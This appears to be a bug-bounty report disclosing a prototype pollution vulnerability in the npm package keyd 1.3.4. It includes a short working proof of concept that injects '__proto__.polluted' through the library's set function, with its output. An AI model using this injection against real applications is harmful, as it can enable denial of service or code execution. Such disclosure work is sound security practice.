I would like to report a prototype pollution vulnerability in keyd module.
It allows an attacker to inject properties on Object.prototype.

Module

module name: keydversion:1.3.4npm page: https://www.npmjs.com/package/keyd

Module Description

A small library for using and manipulating key paths in JavaScript.

Module Stats

[71] weekly downloads

Vulnerability

Vulnerability Description

The set function can be used to add/modify properties of the Object prototype. These properties will be present on all objects.

Steps To Reproduce:

• install keyd module:
  • npm i keyd

Set the __proto__.polluted property of an object:

const keyd = require('keyd');
const obj = {};
console.log("Before : " + obj.polluted);
keyd({}).set('__proto__.polluted', 'yes');
console.log("After : " + obj.polluted);

Output:

Before : undefined
After : yes

{F833532}

Supporting Material/References:

• OPERATING SYSTEM VERSION: Ubuntu 18.04.4 LTS
• NODEJS VERSION: v14.1.0
• NPM VERSION: 6.14.5

Wrap up

• I contacted the maintainer to let them know: [N]
• I opened an issue in the related repository: [N]

Thank you for your time.

best regards,

d3lla

Impact

The impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution, Property Injection.